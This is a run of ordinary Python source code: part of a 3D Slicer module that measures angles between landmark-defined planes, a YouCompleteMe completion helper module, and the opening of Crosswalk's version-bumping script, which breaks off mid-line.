fidlist.GetNthFiducialLabel(fidlist.GetNumberOfFiducials() - 1) self.midPointFiducialDictionaryID[label] = fidlist.GetNthMarkupID(fidlist.GetNumberOfFiducials() - 1) self.landmarkComboBox1MidPoint.addItem(label) self.landmarkComboBox2MidPoint.addItem(label) def onFiducialRemovedMidPoint(self, obj, event): fidlist = obj print obj for i in range(1, self.landmarkComboBox1MidPoint.count): print i label = self.landmarkComboBox1MidPoint.itemText(i) found = self.fiducialInListMidPoint(label, fidlist) if not found: del self.midPointFiducialDictionaryID[label] self.landmarkComboBox1MidPoint.removeItem(i) self.landmarkComboBox2MidPoint.removeItem(i) break def fiducialInListMidPoint(self, name, fidlist): for i in range(0, fidlist.GetNumberOfFiducials()): if name == fidlist.GetNthFiducialLabel(i) : return True return False def onCloseScene(self, obj, event): keys = self.planeControlsDictionary.keys() for i in range(0, len(keys)): self.planeControlsDictionary[keys[i]].remove() del self.planeControlsDictionary[keys[i]] globals()[self.moduleName] = slicer.util.reloadScriptedModule(self.moduleName) def angleValue(self): self.valueComboBox() self.getAngle_RL.setText(self.logic.angle_degre_RL) self.getAngle_RL_comp.setText(self.logic.angle_degre_RL_comp) self.getAngle_SI.setText(self.logic.angle_degre_SI) self.getAngle_SI_comp.setText(self.logic.angle_degre_SI_comp) self.getAngle_AP.setText(self.logic.angle_degre_AP) self.getAngle_AP_comp.setText(self.logic.angle_degre_AP_comp) def valueComboBox(self): colorPlane1 = self.planeComboBox1.currentText colorPlane2 = self.planeComboBox2.currentText print colorPlane1 print colorPlane2 redslice = slicer.mrmlScene.GetNodeByID('vtkMRMLSliceNodeRed') redslice.SetWidgetVisible(False) yellowslice = slicer.mrmlScene.GetNodeByID('vtkMRMLSliceNodeYellow') yellowslice.SetWidgetVisible(False) greenslice = slicer.mrmlScene.GetNodeByID('vtkMRMLSliceNodeGreen') greenslice.SetWidgetVisible(False) self.defineAngle(colorPlane1,colorPlane2) def modify(self, obj, event): self.defineAngle(self.planeComboBox1.currentText, self.planeComboBox2.currentText) def defineAngle(self, colorPlane1, colorPlane2): print "DEFINE ANGLE" print colorPlane1 if colorPlane1 in self.logic.ColorNodeCorrespondence: slice1 = slicer.util.getNode(self.logic.ColorNodeCorrespondence[colorPlane1]) self.logic.getMatrix(slice1) slice1.SetWidgetVisible(True) matrix1 = self.logic.getMatrix(slice1) normal1 = self.logic.defineNormal(matrix1) else: normal1 = self.planeControlsDictionary[colorPlane1].logic.N print colorPlane2 if colorPlane2 in self.logic.ColorNodeCorrespondence: slice2 = slicer.util.getNode(self.logic.ColorNodeCorrespondence[colorPlane2]) self.logic.getMatrix(slice2) slice2.SetWidgetVisible(True) matrix2 = self.logic.getMatrix(slice2) normal2 = self.logic.defineNormal(matrix2) else: normal2 = self.planeControlsDictionary[colorPlane2].logic.N self.logic.getAngle(normal1, normal2) def onSavePlanes(self): self.savePlanes() def savePlanes(self, filename = None): tempDictionary = {} sliceRed = slicer.util.getNode(self.logic.ColorNodeCorrespondence['red']) tempDictionary["red"] = self.logic.getMatrix(sliceRed).tolist() sliceYellow = slicer.util.getNode(self.logic.ColorNodeCorrespondence['yellow']) tempDictionary["yellow"] = self.logic.getMatrix(sliceYellow).tolist() sliceGreen = slicer.util.getNode(self.logic.ColorNodeCorrespondence['green']) tempDictionary["green"] = self.logic.getMatrix(sliceGreen).tolist() tempDictionary["customPlanes"] = {} for key, plane in self.planeControlsDictionary.items(): tempDictionary["customPlanes"][plane.id] = plane.getFiducials() print filename if filename is None: filename = qt.QFileDialog.getSaveFileName(parent=self, caption='Save file') if filename != "": fileObj = open(filename, "wb") pickle.dump(tempDictionary, fileObj) fileObj.close() def onReadPlanes(self): self.readPlanes() def readPlanes(self, filename=None): if filename is None: filename = qt.QFileDialog.getOpenFileName(parent=self,caption='Open file') if filename != "": fileObj = open(filename, "rb") tempDictionary = pickle.load( fileObj ) node = slicer.mrmlScene.GetNodeByID('vtkMRMLSliceNodeRed') matList = tempDictionary["red"] matNode = node.GetSliceToRAS() for col in range(0, len(matList)): for row in range(0, len(matList[col])): matNode.SetElement(col, row, matList[col][row]) node = slicer.mrmlScene.GetNodeByID('vtkMRMLSliceNodeYellow') matList = tempDictionary["yellow"] matNode = node.GetSliceToRAS() for col in range(0, len(matList)): for row in range(0, len(matList[col])): matNode.SetElement(col, row, matList[col][row]) node = slicer.mrmlScene.GetNodeByID('vtkMRMLSliceNodeGreen') matList = tempDictionary["green"] matNode = node.GetSliceToRAS() for col in range(0, len(matList)): for row in range(0, len(matList[col])): matNode.SetElement(col, row, matList[col][row]) customPlanes = tempDictionary["customPlanes"] for key, fidlist in customPlanes.items(): self.addNewPlane(key) tempkey = "Plane " + str(self.planeControlsId) currentFidList = self.planeControlsDictionary[tempkey].logic.getFiducialList() for i in range(0, len(fidlist)): f = fidlist[i] currentFidList.AddFiducial(f[0], f[1], f[2]) fileObj.close() # This widget controls each of the planes that are added to the interface. # The widget contains its own logic, i.e. an object of AnglePlanesLogic. # Each plane contains a separate fiducial list. The planes are named P1, P2, ..., PN. The landmarks are named # P1-1, P1-2, P1-N. class AnglePlanesWidgetPlaneControl(qt.QFrame): def __init__(self, anglePlanes, id, pointlocatordictionary): qt.QFrame.__init__(self) self.id = id self.setLayout(qt.QFormLayout()) self.pointLocatorDictionary = pointlocatordictionary landmarkLayout = qt.QHBoxLayout() planeLabel = qt.QLabel('Plane ' + str(id) + ":") landmarkLayout.addWidget(planeLabel) self.logic = AnglePlanesLogic(id) label1 = qt.QLabel(' L1:') self.landmark1ComboBox = qt.QComboBox() landmark1ComboBox = self.landmark1ComboBox landmark1ComboBox.addItem("Select") landmark1ComboBox.connect('currentIndexChanged(QString)', self.placePlaneClicked) landmarkLayout.addWidget(label1) landmarkLayout.addWidget(landmark1ComboBox) label2 = qt.QLabel(' L2:') self.landmark2ComboBox = qt.QComboBox() landmark2ComboBox = self.landmark2ComboBox landmark2ComboBox.addItem("Select") landmark2ComboBox.connect('currentIndexChanged(QString)', self.placePlaneClicked) landmarkLayout.addWidget(label2) landmarkLayout.addWidget(landmark2ComboBox) label3 = qt.QLabel(' L3:') self.landmark3ComboBox = qt.QComboBox() landmark3ComboBox = self.landmark3ComboBox landmark3ComboBox.addItem("Select") landmark3ComboBox.connect('currentIndexChanged(QString)', self.placePlaneClicked) landmarkLayout.addWidget(label3) landmarkLayout.addWidget(landmark3ComboBox) addFiducialLabel = qt.QLabel('Add') addFiducialButton = qt.QPushButton(qt.QIcon(":/Icons/MarkupsAddFiducial.png"), " ") addFiducialButton.setFixedSize(50,25) addFiducialButton.connect('clicked()', self.addLandMarkClicked) addFiducialButton.setEnabled(True) landmarkLayout.addWidget(addFiducialLabel) landmarkLayout.addWidget(addFiducialButton) #fiducial list for the plane fidNode = self.logic.getFiducialList() for i in range(0, fidNode.GetNumberOfFiducials()): label = fidNode.GetNthFiducialLabel(i) landmark1ComboBox.addItem(label) landmark2ComboBox.addItem(label) landmark3ComboBox.addItem(label) anglePlanes.landmarkComboBox1MidPoint.addItem(label) anglePlanes.landmarkComboBox2MidPoint.addItem(label) anglePlanes.midPointFiducialDictionaryID[label] = fidNode.GetNthMarkupID(i) fidNode.AddObserver(fidNode.MarkupAddedEvent, self.onFiducialAdded) fidNode.AddObserver(fidNode.MarkupRemovedEvent, self.onFiducialRemoved) self.setPointModifiedEventId = fidNode.AddObserver(fidNode.PointModifiedEvent, self.onPointModifiedEvent) # This observers are in AnglePlaneWidgets, they listen to any fiducial being added # fidNode.AddObserver(fidNode.MarkupAddedEvent, anglePlanes.onFiducialAddedMidPoint) fidNode.AddObserver(fidNode.MarkupRemovedEvent, anglePlanes.onFiducialRemovedMidPoint) self.layout().addRow(landmarkLayout) self.slider = ctk.ctkSliderWidget() slider = self.slider slider.singleStep = 0.1 slider.minimum = 0.1 slider.maximum = 10 slider.value = 1.0 slider.toolTip = "Set the size of your plane." self.slideOpacity = ctk.ctkSliderWidget() slideOpacity = self.slideOpacity slideOpacity.singleStep = 0.1 slideOpacity.minimum = 0.1 slideOpacity.maximum = 1 slideOpacity.value = 1.0 slideOpacity.toolTip = "Set the opacity of your plane." slider.connect('valueChanged(double)', self.placePlaneClicked) slideOpacity.connect('valueChanged(double)', self.placePlaneClicked) landmarkSliderLayout = qt.QHBoxLayout() label = qt.QLabel(' Size:') label2 = qt.QLabel(' Opacity:') landmarkSliderLayout.addWidget(label) landmarkSliderLayout.addWidget(self.slider) landmarkSliderLayout.addWidget(label2) landmarkSliderLayout.addWidget(self.slideOpacity) self.surfaceDeplacementCheckBox = qt.QCheckBox("On Surface") self.surfaceDeplacementCheckBox.setChecked(True) self.surfaceDeplacementCheckBox.connect('stateChanged(int)', self.onSurfaceDeplacementStateChanged) landmarkSliderLayout.addWidget(self.surfaceDeplacementCheckBox) self.layout().addRow(landmarkSliderLayout) def remove(self): self.logic.remove() def onFiducialRemoved(self, obj, event): fidlist = obj for i in range(1, self.landmark1ComboBox.count): #print i found = self.fiducialInList(self.landmark1ComboBox.itemText(i), fidlist) if not found: self.landmark1ComboBox.removeItem(i) self.landmark2ComboBox.removeItem(i) self.landmark3ComboBox.removeItem(i) break def getFiducials(self): fidNode = self.logic.getFiducialList() listCoord = list() coord = numpy.zeros(3) fidNode.GetNthFiducialPosition(int(self.landmark1ComboBox.currentIndex)-1, coord) listCoord.append(coord) fidNode.GetNthFiducialPosition(int(self.landmark2ComboBox.currentIndex)-1, coord) listCoord.append(coord) fidNode.GetNthFiducialPosition(int(self.landmark3ComboBox.currentIndex)-1, coord) listCoord.append(coord) return listCoord def placePlaneClicked(self): self.update() def fiducialInList(self, name, fidlist): for i in range(0, fidlist.GetNumberOfFiducials()): if name == fidlist.GetNthFiducialLabel(i) : return True return False def projectAllFiducials(self): fidlist = self.logic.getFiducialList() for i in range(0, fidlist.GetNumberOfFiducials()): self.projectFiducialOnClosestSurface(fidlist, i, self.pointLocatorDictionary) def onPointModifiedEvent(self, obj, event): if self.surfaceDeplacementCheckBox.isChecked(): self.projectAllFiducials() self.update(); def onSurfaceDeplacementStateChanged(self): if self.surfaceDeplacementCheckBox.isChecked(): self.projectAllFiducials() self.update() def update(self): # print "landmarks index " + str(self.landmark1ComboBox.currentIndex) + ", " + str(self.landmark2ComboBox.currentIndex) + ", " + str(self.landmark3ComboBox.currentIndex) + ", " if self.landmark1ComboBox.currentIndex > 0 and self.landmark2ComboBox.currentIndex > 0 and self.landmark3ComboBox.currentIndex > 0: self.logic.planeLandmarks(self.landmark1ComboBox.currentIndex, self.landmark2ComboBox.currentIndex, self.landmark3ComboBox.currentIndex, self.slider.value, self.slideOpacity.value) def projectFiducialOnClosestSurface(self, fidlist, fidid, pointLocatorDictionary): landmarkCoord = numpy.zeros(3) fidlist.GetNthFiducialPosition(fidid, landmarkCoord) minDistance = MAXINT minClosestPoint = numpy.zeros(3) #print "landmark: " + str(landmarkCoord) + ", fidid: " + str(fidid) keys = pointLocatorDictionary.keys() for i in range(0, len(keys)): locator = pointLocatorDictionary[keys[i]] closestpointid = locator.FindClosestPoint(landmarkCoord) mrmlmodelcollection = slicer.mrmlScene.GetNodesByClassByName("vtkMRMLModelNode", keys[i]) modelnode = mrmlmodelcollection.GetItemAsObject(0) closestpoint = modelnode.GetPolyData().GetPoints().GetPoint(closestpointid) #print "closestpointid:" + str(closestpointid) + ", point: " + str(closestpoint) distance = numpy.linalg.norm( closestpoint - landmarkCoord ) #print "distance: " + str(distance) if distance < minDistance: minDistance = distance minClosestPoint = closestpoint if minClosestPoint[0] !=landmarkCoord[0] or minClosestPoint[1] != landmarkCoord[1] or minClosestPoint[2] != landmarkCoord[2]: fidlist.RemoveObserver(self.setPointModifiedEventId) fidlist.SetNthFiducialPosition(fidid, minClosestPoint[0], minClosestPoint[1], minClosestPoint[2]) self.setPointModifiedEventId = fidlist.AddObserver(fidlist.PointModifiedEvent, self.onPointModifiedEvent) def addLandMarkClicked(self): #print "Add landmarks" # # Place landmarks in the 3D scene fidlist = self.logic.getFiducialList() slicer.mrmlScene.AddNode(fidlist) interactionNode = slicer.mrmlScene.GetNodeByID("vtkMRMLInteractionNodeSingleton") interactionNode.SetCurrentInteractionMode(1) def onFiducialAdded(self, obj, event): fidlist = obj label = fidlist.GetNthFiducialLabel(fidlist.GetNumberOfFiducials() - 1) self.landmark1ComboBox.addItem(label) self.landmark2ComboBox.addItem(label) self.landmark3ComboBox.addItem(label) class AnglePlanesLogic(ScriptedLoadableModuleLogic): def __init__(self, id = -1): self.ColorNodeCorrespondence = {'red': 'vtkMRMLSliceNodeRed', 'yellow': 'vtkMRMLSliceNodeYellow', 'green': 'vtkMRMLSliceNodeGreen'} self.id = id self.initialize() def initialize(self): self.layoutManager=slicer.app.layoutManager() self.threeDWidget=self.layoutManager.threeDWidget(0) self.threeDView=self.threeDWidget.threeDView() self.renderWindow=self.threeDView.renderWindow() self.renderers=self.renderWindow.GetRenderers() self.renderer=self.renderers.GetFirstRenderer() self.polydata = vtk.vtkPolyData() self.points = vtk.vtkPoints() self.planeSource = vtk.vtkPlaneSource() self.mapper = vtk.vtkPolyDataMapper() self.actor = vtk.vtkActor() self.renderer.AddViewProp(self.actor) self.renderWindow.AddRenderer(self.renderer) def remove(self): self.renderer.RemoveViewProp(self.actor) self.renderer.Render() def getFiducialList(self): P = self.getFiducialListName() nodes = slicer.mrmlScene.GetNodesByClassByName('vtkMRMLMarkupsFiducialNode', P) if nodes.GetNumberOfItems() == 0: # The list does not exist so we create it fidNode = slicer.vtkMRMLMarkupsFiducialNode() fidNode.SetName(P) slicer.mrmlScene.AddNode(fidNode) else: #The list exists but the observers must be updated fidNode = nodes.GetItemAsObject(0) return fidNode def getFiducialListName(self) : return "P" + str(self.id) def getMatrix(self, slice): self.mat = slice.GetSliceToRAS() print self.mat #---------------------- RED SLICE -----------------------# # Matrix with the elements of SliceToRAS m = numpy.matrix([[self.mat.GetElement(0,0), self.mat.GetElement(0,1), self.mat.GetElement(0,2), self.mat.GetElement(0,3)], [self.mat.GetElement(1,0), self.mat.GetElement(1,1), self.mat.GetElement(1,2), self.mat.GetElement(1,3)], [self.mat.GetElement(2,0), self.mat.GetElement(2,1), self.mat.GetElement(2,2), self.mat.GetElement(2,3)], [self.mat.GetElement(3,0), self.mat.GetElement(3,1), self.mat.GetElement(3,2), self.mat.GetElement(3,3)]]) return m def defineNormal(self, matrix): # Normal vector to the Red slice: n_vector = numpy.matrix([[0],[0],[1],[1]]) # point on the Red slice: A = numpy.matrix([[0], [0], [0], [1]]) normalVector = matrix * n_vector #print "n : \n", normalVector A = matrix * A normalVector1 = normalVector normalVector1[0] = normalVector[0] - A[0] normalVector1[1] = normalVector[1] - A[1] normalVector1[2] = normalVector[2] - A[2] #print normalVector1 return normalVector1 def getAngle(self, normalVect1, normalVect2): norm1 = sqrt(normalVect1[0]*normalVect1[0]+normalVect1[1]*normalVect1[1]+normalVect1[2]*normalVect1[2]) #print "norme 1: \n", norm1 norm2 =sqrt(normalVect2[0]*normalVect2[0]+normalVect2[1]*normalVect2[1]+normalVect2[2]*normalVect2[2]) #print "norme 2: \n", norm2 scalar_product = (normalVect1[0]*normalVect2[0]+normalVect1[1]*normalVect2[1]+normalVect1[2]*normalVect2[2]) #print "scalar product : \n", scalar_product angle = acos(scalar_product/(norm1*norm2)) #print "radian angle : ", angle angle_degree = angle*180/pi #print "Angle in degree", angle_degree norm1_RL = sqrt(normalVect1[1]*normalVect1[1]+normalVect1[2]*normalVect1[2]) #print "norme RL: \n", norm1_RL norm2_RL =sqrt(normalVect2[1]*normalVect2[1]+normalVect2[2]*normalVect2[2]) #print "norme RL: \n", norm2_RL if (norm1_RL ==0 or norm1_RL ==0): self.angle_degre_RL = 0 self.angle_degre_RL_comp = 0 else: scalar_product_RL = (normalVect1[1]*normalVect2[1]+normalVect1[2]*normalVect2[2]) #print "scalar product : \n", scalar_product_RL angleRL = acos(scalar_product_RL/(norm1_RL*norm2_RL)) #print "radian angle : ", angleRL self.angle_degre_RL = angleRL*180/pi self.angle_degre_RL = round(self.angle_degre_RL,2) #print self.angle_degre_RL self.angle_degre_RL_comp = 180-self.angle_degre_RL norm1_SI = sqrt(normalVect1[0]*normalVect1[0]+normalVect1[1]*normalVect1[1]) #print "norme1_SI : \n", norm1_SI norm2_SI =sqrt(normalVect2[0]*normalVect2[0]+normalVect2[1]*normalVect2[1]) #print "norme2_SI : \n", norm2_SI if (norm1_SI ==0 or norm2_SI ==0): self.angle_degre_SI = 0 self.angle_degre_SI_comp = 0 else: scalar_product_SI = (normalVect1[0]*normalVect2[0]+normalVect1[1]*normalVect2[1]) #print "scalar product_SI : \n", scalar_product_SI angleSI = acos(scalar_product_SI/(norm1_SI*norm2_SI)) #print "radian angle : ", angleSI self.angle_degre_SI = angleSI*180/pi self.angle_degre_SI = round(self.angle_degre_SI,2) #print self.angle_degre_SI self.angle_degre_SI_comp = 180-self.angle_degre_SI #print self.angle_degre_SI_comp norm1_AP = sqrt(normalVect1[0]*normalVect1[0]+normalVect1[2]*normalVect1[2]) #print "norme1_SI : \n", norm1_AP norm2_AP =sqrt(normalVect2[0]*normalVect2[0]+normalVect2[2]*normalVect2[2]) #print "norme2_SI : \n", norm2_AP if (norm1_AP ==0 or norm2_AP ==0): self.angle_degre_AP = 0 self.angle_degre_AP_comp = 0 else: scalar_product_AP = (normalVect1[0]*normalVect2[0]+normalVect1[2]*normalVect2[2]) #print "scalar product_SI : \n", scalar_product_AP #print "VALUE :", scalar_product_AP/(norm1_AP*norm2_AP) angleAP = acos(scalar_product_AP/(norm1_AP*norm2_AP)) #print "radian angle : ", angleAP self.angle_degre_AP = angleAP*180/pi self.angle_degre_AP = round(self.angle_degre_AP,2) #print self.angle_degre_AP self.angle_degre_AP_comp = 180-self.angle_degre_AP def normalLandmarks(self, GA, GB): Vn = numpy.matrix([[0],[0],[0]]) Vn[0] = GA[1]*GB[2] - GA[2]*GB[1] Vn[1] = GA[2]*GB[0] - GA[0]*GB[2] Vn[2] = GA[0]*GB[1] - GA[1]*GB[0] #print "Vn = ",Vn norm_Vn = sqrt(Vn[0]*Vn[0]+Vn[1]*Vn[1]+Vn[2]*Vn[2]) Normal = Vn/norm_Vn #print "N = ",Normal return Normal def defineNormal(self, matrix): # Normal vector to the Red slice: n_vector = numpy.matrix([[0],[0],[1],[1]]) # point on the Red slice: A = numpy.matrix([[0], [0], [0], [1]]) normalVector = matrix * n_vector #print "n : \n", normalVector A = matrix * A normalVector1 = normalVector normalVector1[0] = normalVector[0] - A[0] normalVector1[1] = normalVector[1] - A[1] normalVector1[2] = normalVector[2] - A[2] #print normalVector1 return normalVector1 def planeLandmarks(self, Landmark1Value, Landmark2Value, Landmark3Value, slider, sliderOpacity): # Limit the number of 3 landmarks to define a plane # Keep the coordinates of the landmarks fidNode = self.getFiducialList() r1 = 0 a1 = 0 s1 = 0 coord = numpy.zeros(3) if Landmark1Value != 0: fidNode.GetNthFiducialPosition(int(Landmark1Value)-1, coord) r1 = coord[0] a1 = coord[1] s1 = coord[2] # Limit the number of 3 landmarks to define a plane # Keep the coordinates of the landmarks r2 = 0 a2 = 0 s2 = 0 if Landmark2Value != 0: fidNode.GetNthFiducialPosition(int(Landmark2Value)-1, coord) r2 = coord[0] a2 = coord[1] s2 = coord[2] # Limit the number of 3 landmarks to define a plane # Keep the coordinates of the landmarks r3 = 0 a3 = 0 s3 = 0 if Landmark3Value != 0: fidNode.GetNthFiducialPosition(int(Landmark3Value)-1, coord) r3 = coord[0] a3 = coord[1] s3 = coord[2] points = self.points if points.GetNumberOfPoints() == 0: points.InsertNextPoint(r1,a1,s1) points.InsertNextPoint(r2,a2,s2) points.InsertNextPoint(r3,a3,s3) else: points.SetPoint(0, r1,a1,s1) points.SetPoint(1, r2,a2,s2) points.SetPoint(2, r3,a3,s3) polydata = self.polydata polydata.SetPoints(points) centerOfMass = vtk.vtkCenterOfMass() centerOfMass.SetInputData(polydata) centerOfMass.SetUseScalarsAsWeights(False) centerOfMass.Update() G = centerOfMass.GetCenter() #print "Center of mass = ",G A = (r1,a1,s1) B = (r2,a2,s2) C = (r3,a3,s3) # Vector GA GA = numpy.matrix([[0],[0],[0]]) GA[0] = A[0]-G[0] GA[1] = A[1]-G[1] GA[2] = A[2]-G[2] #print "GA = ", GA # Vector BG GB = numpy.matrix([[0],[0],[0]]) GB[0] = B[0]-G[0] GB[1] = B[1]-G[1] GB[2] = B[2]-G[2] #print "GB = ", GB # Vector CG GC = numpy.matrix([[0],[0],[0]]) GC[0] = C[0]-G[0] GC[1] = C[1]-G[1] GC[2] = C[2]-G[2] #print "GC = ", GC self.N = self.normalLandmarks(GA,GB) D = numpy.matrix([[0],[0],[0]]) E = numpy.matrix([[0],[0],[0]]) F = numpy.matrix([[0],[0],[0]]) D[0] = slider*GA[0] + G[0] D[1] = slider*GA[1] + G[1] D[2] = slider*GA[2] + G[2] #print "Slider value : ", slider #print "D = ",D E[0] = slider*GB[0] + G[0] E[1] = slider*GB[1] + G[1] E[2] = slider*GB[2] + G[2] #print "E = ",E F[0] = slider*GC[0] + G[0] F[1] = slider*GC[1] + G[1] F[2] = slider*GC[2] + G[2] #print "F = ",F planeSource = self.planeSource planeSource.SetNormal(self.N[0],self.N[1],self.N[2]) planeSource.SetOrigin(D[0],D[1],D[2]) planeSource.SetPoint1(E[0],E[1],E[2]) planeSource.SetPoint2(F[0],F[1],F[2]) planeSource.Update() plane = planeSource.GetOutput() mapper = self.mapper mapper.SetInputData(plane) mapper.Update() self.actor.SetMapper(mapper) self.actor.GetProperty().SetColor(0, 0.4, 0.8) self.actor.GetProperty().SetOpacity(sliderOpacity) self.renderer.Render() self.renderWindow.Render() class AnglePlanesTest(ScriptedLoadableModuleTest): def setUp(self): # reset the state - clear scene slicer.mrmlScene.Clear(0) def runTest(self): # run all tests needed self.setUp() self.test_AnglePlanes() def test_AnglePlanes(self): self.delayDisplay('Starting the test') self.delayDisplay('Adding planes') widget = AnglePlanesWidget() widget.addNewPlane() widget.addNewPlane() self.delayDisplay('Adding fiducials') fidlist1 = slicer.mrmlScene.GetNodesByClassByName('vtkMRMLMarkupsFiducialNode', "P1").GetItemAsObject(0) fidlist1.AddFiducial(10,10,10) fidlist1.AddFiducial(20,20,20) fidlist1.AddFiducial(10,20,30) fidlist2 = slicer.mrmlScene.GetNodesByClassByName('vtkMRMLMarkupsFiducialNode', "P2").GetItemAsObject(0) fidlist2.AddFiducial(50,50,50) fidlist2.AddFiducial(40,20,80) fidlist2.AddFiducial(10,40,20) self.delayDisplay('Saving planes') widget.savePlanes("test.p") self.delayDisplay('Loading planes') widget.readPlanes("test.p") self.delayDisplay('Selecting fiducials') widget.planeControlsDictionary["Plane 1"].landmark1ComboBox.setCurrentIndex(1) widget.planeControlsDictionary["Plane 1"].landmark2ComboBox.setCurrentIndex(2) widget.planeControlsDictionary["Plane 1"].landmark3ComboBox.setCurrentIndex(3) widget.planeControlsDictionary["Plane 2"].landmark1ComboBox.setCurrentIndex(1) widget.planeControlsDictionary["Plane 2"].landmark2ComboBox.setCurrentIndex(2) widget.planeControlsDictionary["Plane 2"].landmark3ComboBox.setCurrentIndex(3) self.delayDisplay('Selecting planes') widget.planeComboBox1.setCurrentIndex(5) widget.planeComboBox2.setCurrentIndex(6) self.delayDisplay('Calculating angle') widget.angleValue() test = widget.logic.angle_degre_RL != 59.06 or widget.logic.angle_degre_RL_comp != 120.94 or widget.logic.angle_degre_SI != 12.53 or widget.logic.angle_degre_SI_comp != 167.47 or widget.logic.angle_degre_AP != 82.56 or widget.logic.angle_degre_AP_comp != 97.44 self.delayDisplay('Testing angles') if test: print "", "Angle", "Complementary" print "R-L-View", self.logic.angle_degre_RL, self.logic.angle_degre_RL_comp print "S-I-View", self.logic.angle_degre_SI, self.logic.angle_degre_SI_comp print "A-P-View", self.logic.angle_degre_AP, self.logic.angle_degre_AP_comp self.delayDisplay('Test Failure!') else: self.delayDisplay('Test passed!') widget.parent.close()
# Copyright (C) 2011, 2012 Google Inc. # # This file is part of YouCompleteMe. # # YouCompleteMe is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # YouCompleteMe is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with YouCompleteMe. If not, see <http://www.gnu.org/licenses/>. from __future__ import unicode_literals from __future__ import print_function from __future__ import division from __future__ import absolute_import from future import standard_library standard_library.install_aliases() from builtins import * # noqa from future.utils import iteritems from ycm import vimsupport from ycmd import user_options_store from ycmd import request_wrap from ycmd import identifier_utils YCM_VAR_PREFIX = 'ycm_' def BuildServerConf(): """Builds a dictionary mapping YCM Vim user options to values. Option names don't have the 'ycm_' prefix.""" # We only evaluate the keys of the vim globals and not the whole dictionary # to avoid unicode issues. # See https://github.com/Valloric/YouCompleteMe/pull/2151 for details. keys = vimsupport.GetVimGlobalsKeys() server_conf = {} for key in keys: if not key.startswith( YCM_VAR_PREFIX ): continue new_key = key[ len( YCM_VAR_PREFIX ): ] new_value = vimsupport.VimExpressionToPythonType( 'g:' + key ) server_conf[ new_key ] = new_value return server_conf def LoadJsonDefaultsIntoVim(): defaults = user_options_store.DefaultOptions() for key, value in iteritems( defaults ): new_key = 'g:ycm_' + key if not vimsupport.VariableExists( new_key ): vimsupport.SetVariableValue( new_key, value ) def CompletionStartColumn(): return ( request_wrap.CompletionStartColumn( vimsupport.CurrentLineContents(), vimsupport.CurrentColumn() + 1, vimsupport.CurrentFiletypes()[ 0 ] ) - 1 ) def CurrentIdentifierFinished(): current_column = vimsupport.CurrentColumn() previous_char_index = current_column - 1 if previous_char_index < 0: return True line = vimsupport.CurrentLineContents() filetype = vimsupport.CurrentFiletypes()[ 0 ] regex = identifier_utils.IdentifierRegexForFiletype( filetype ) for match in regex.finditer( line ): if match.end() == previous_char_index: return True # If the whole line is whitespace, that means the user probably finished an # identifier on the previous line. return line[ : current_column ].isspace() def LastEnteredCharIsIdentifierChar(): current_column = vimsupport.CurrentColumn() if current_column - 1 < 0: return False line = vimsupport.CurrentLineContents() filetype = vimsupport.CurrentFiletypes()[ 0 ] return ( identifier_utils.StartOfLongestIdentifierEndingAtIndex( line, current_column, filetype ) != current_column ) def AdjustCandidateInsertionText( candidates ): """This function adjusts the candidate insertion text to take into account the text that's currently in front of the cursor. For instance ('|' represents the cursor): 1. Buffer state: 'foo.|bar' 2. A completion candidate of 'zoobar' is shown and the user selects it. 3. Buffer state: 'foo.zoobar|bar' instead of 'foo.zoo|bar' which is what the user wanted. This function changes candidates to resolve that issue. It could be argued that the user actually wants the final buffer state to be 'foo.zoobar|' (the cursor at the end), but that would be much more difficult to implement and is probably not worth doing. """ def NewCandidateInsertionText( to_insert, text_after_cursor ): overlap_len = OverlapLength( to_insert, text_after_cursor ) if overlap_len: return to_insert[ :-overlap_len ] return to_insert text_after_cursor = vimsupport.TextAfterCursor() if not text_after_cursor: return candidates new_candidates = [] for candidate in candidates: if isinstance( candidate, dict ): new_candidate = candidate.copy() if 'abbr' not in new_candidate: new_candidate[ 'abbr' ] = new_candidate[ 'word' ] new_candidate[ 'word' ] = NewCandidateInsertionText( new_candidate[ 'word' ], text_after_cursor ) new_candidates.append( new_candidate ) elif isinstance( candidate, str ) or isinstance( candidate, bytes ): new_candidates.append( { 'abbr': candidate, 'word': NewCandidateInsertionText( candidate, text_after_cursor ) } ) return new_candidates def OverlapLength( left_string, right_string ): """Returns the length of the overlap between two strings. Example: "foo baro" and "baro zoo" -> 4 """ left_string_length = len( left_string ) right_string_length = len( right_string ) if not left_string_length or not right_string_length: return 0 # Truncate the longer string. if left_string_length > right_string_length: left_string = left_string[ -right_string_length: ] elif left_string_length < right_string_length: right_string = right_string[ :left_string_length ] if left_string == right_string: return min( left_string_length, right_string_length ) # Start by looking for a single character match # and increase length until no match is found. best = 0 length = 1 while True: pattern = left_string[ -length: ] found = right_string.find( pattern ) if found < 0: return best length += found if left_string[ -length: ] == right_string[ :length ]: best = length length += 1
#!/usr/bin/env python # Copyright (c) 2013 Intel Corporation. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ increment-version.py -- Bump Beta or Canary version number across all required files. Crosswalk's versioning schema is "MAJOR.MINOR.BUILD.PATCH". Incrementing a beta version will monotonically increase the PATCH number, while incrementing a canary version will monotonically increase the BUILD number. """ import optparse import os import re import sys def PathFromRoot(path): """ Returns the absolute path to |path|, which is supposed to be relative to the repository's root directory. """ return os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', path) def IncrementVersions(replacements): """ |replacements| is a dictionary whose keys are files (relative to the root of the repository) and values are regular expresions that match a section in the file with the version number we want to increase. The regular expression is expected to have 2 groups, the first matching whatever precedes the version number and needs to stay the same, and the second matching the number itself. Each of the files specified will be overwritten with new version numbers. """ for path, regexp in replacements.iteritems(): # The paths are always relative to the repository's root directory. path = PathFromRoot(path) def _ReplacementFunction(match_obj): version_number = int(match_obj.group(2)) return '%s%s' % (match_obj.group(1), version_number + 1) contents = re.sub(regexp, _ReplacementFunction, open(path).read()) open(path, 'w').write(contents) def Main(): option_parser = optparse.OptionParser() option_parser.add_option( '', '--type', choices=('beta', 'canary'), dest='release_type', help='What part of the version number must be increased. \"beta\" ' 'increases the patch version, \"canary\" increases the build ' 'version.') options, _ = option_parser.parse_args() if options.release_type == 'beta': replacements = { 'VERSION': r'(PATCH=)(\d+)', 'packaging/crosswalk.spec': r'(Version:\s+\d+\.\d+\.\d+\.)(\d+)', } IncrementVersions(replacements) elif options.release_type == 'canary': replacements = { 'VERSION': 